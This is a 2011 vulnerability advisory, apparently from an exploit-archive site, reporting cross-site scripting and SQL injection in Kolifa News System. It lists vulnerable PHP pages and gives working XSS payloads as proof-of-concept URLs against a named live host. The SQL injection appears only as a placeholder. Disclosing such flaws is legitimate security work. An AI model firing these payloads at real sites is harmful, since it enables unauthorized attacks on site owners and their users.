Kolifa News System Cross Site Scripting / SQL Injection

2011.09.06

Credit: Eyup CELIK

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

# Exploit Title: Kolifa News System SQL Injection - Stored XSS
# Date: 2011
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability
# Web Site: www.eyupcelik.com.tr


ISSUE

SQL Injection and XSS can be done using the command input

Vulnerable Page:
arama.php
iletisim.php
habergoster.php


Example:
habergoster.php?haber_id=<XSS Code>
arama.php?haber_baslik=&show=<SQL Injection Code>


Exploit:
habergoster.php?haber_id=" onmouseover%3dprompt(906932) bad%3d"
iletisim.php/"onmouseover=prompt(942217)>
arama.php?haber_baslik=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28950890%29%3c%2fScRiPt%3e&show=2


POC:
http://haberpro.awardspace.com/haber_pro/habergoster.php?haber_id="  
onmouseover%3dprompt(906932) bad%3d"
http://haberpro.awardspace.com/haber_pro/iletisim.php/"onmouseover=prompt(942217)>
http://haberpro.awardspace.com/haber_pro/arama.php?haber_baslik=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28950890%29%3c%2fScRiPt%3e&show=2



Thanks,

Eyup CELIK
Information Technology Security Specialist
http://www.eyupcelik.com.tr

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Kolifa News System Cross Site Scripting / SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.